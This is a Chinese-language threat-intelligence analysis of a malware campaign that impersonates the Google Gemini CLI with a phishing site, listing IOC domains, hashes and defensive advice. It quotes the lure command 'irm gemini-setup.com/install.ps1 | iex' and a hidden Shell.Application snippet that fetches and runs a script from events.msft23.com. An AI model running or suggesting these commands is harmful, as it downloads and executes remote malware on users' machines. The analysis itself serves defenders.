文章总结： 近期出现针对Windows平台的恶意软件攻击活动，攻击者仿冒GoogleGeminiCLI工具搭建钓鱼网站，诱导开发者执行恶意PowerShell脚本实现多阶段载荷投递。攻击流程包括钓鱼站点诱导、初始脚本执行、多级载荷投递和持久化驻留，关键IOC涉及4个恶意域名和4个文件哈希。安全建议包括仅从官方渠道安装工具、封禁恶意域名、监控PowerShell异常行为及及时隔离查杀。 综合评分： 90 文章分类： 恶意软件,威胁情报,安全意识,解决方案,安全运营

伪装成 Google Gemini CLI 的新型 Windows 恶意软件攻击活动分析

原创

忍者 忍者

Khan安全团队

2026年5月15日 16:58 海南

在小说阅读器读本章

去阅读

近期，针对 Windows 平台的恶意软件攻击活动出现新动向，攻击者通过仿冒 Google Gemini CLI 官方工具的方式，诱导技术用户执行恶意 PowerShell 脚本，实现多阶段载荷投递与系统入侵。该攻击精准面向开发者、运维人员等高频使用命令行工具的群体，隐蔽性与欺骗性较强。

一、攻击概况

#

攻击者搭建仿冒 Gemini CLI 的钓鱼网站，以 “官方 CLI 安装工具” 为幌子，诱导用户直接在终端执行远程下载命令。受害主机执行脚本后，会在后台静默加载多级恶意载荷，持续从多个恶意域名拉取后续程序，最终完成入侵行为。

本次样本相关动态分析沙箱链接

https://app.any.run/tasks/b5be817c-56c5-4b88-aa1a-d5b5380a032f

二、攻击流程

#

钓鱼站点诱导攻击者使用仿冒域名搭建与 Gemini CLI 高度相似的页面，提供伪装成 “官方一键安装” 的 PowerShell 指令，诱使用户直接运行。

• 页面标题、Logo、功能描述均模仿真实 Gemini CLI 项目，使用 “Build, debug & deploy with AI” 等话术吸引开发者与技术人员。
• 提供伪装的安装命令：powershell -c "irm gemini-setup.com/install.ps1 | iex"，诱导用户在终端直接执行，利用 PowerShell 的远程下载与执行特性（irm | iex）实现初始感染。

执行初始恶意脚本用户执行命令后，系统会从钓鱼站点下载并执行首个 PowerShell 脚本，该脚本表面伪装正常安装流程，暗中启动隐藏的恶意行为。

$GeminiObj = New-Object -ComObject "Shell.Application";$GeminiObj.ShellExecute("powershell", '"irm events.msft23.com | iex"', $null, "open", 0);

多级载荷投递初始脚本执行后，继续从其他恶意域名拉取第二阶段、第三阶段载荷，通过混淆代码、隐藏执行等方式规避安全工具检测。

驻留与后续攻击最终载荷落地后，攻击者可实现信息窃取、远程控制、持久化驻留或进一步投放其他恶意程序。

三、关键恶意 IOC 指标

#

| 域名 | 用途 | | — | — | | geminicli.co.com | 钓鱼站点，初始诱导 | | gemini-setup.com | 钓鱼站点，托管 install.ps1 | | events.msft23.com | 第二阶段脚本加载，混淆代码载体 | | mo2307.com | 最终 payload 投递 |

#

文件 SHA256 哈希

• 5071921cb1ca369fe8f7af522a00373c8c85e4357f7ea1879d2cb4ae791797d6
• c47610c9df3fb101b0e99f2ac12589db653464edf12cebaa2c67fd33fc7715f3
• ae8f70dad97fedecd707977ca22fd6f656c64c0dac96e03f0f4a6c04d0693f59
• 27e17661f5573f63b65e3a5cfe5bdca75acdc1911441b032781f7ebe125d9194

四、典型行为特征

#

• 利用 PowerShell 远程下载执行：irm | iex 一类指令
• 使用 Shell.Application COM 对象隐藏执行后台命令
• 多级域名接力投递载荷，增加检测难度
• 针对开发者群体，伪装 AI 开发工具，社会工程学欺骗性强

五、安全建议

#

1. 安装命令行工具、开发包时，只从官方 GitHub、官方 npm/pip 等渠道获取，不随意执行陌生网站一键脚本。
2. 企业可在边界设备封禁文中所列恶意域名，防止内网主机主动外联。
3. 终端 EDR 重点监控 PowerShell 隐藏执行、远程下载执行等异常行为。
4. 若发现主机执行过可疑脚本，立即隔离并进行全盘查杀，检查是否存在持久化项。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：Khan安全团队 忍者 忍者《伪装成 Google Gemini CLI 的新型 Windows 恶意软件攻击活动分析》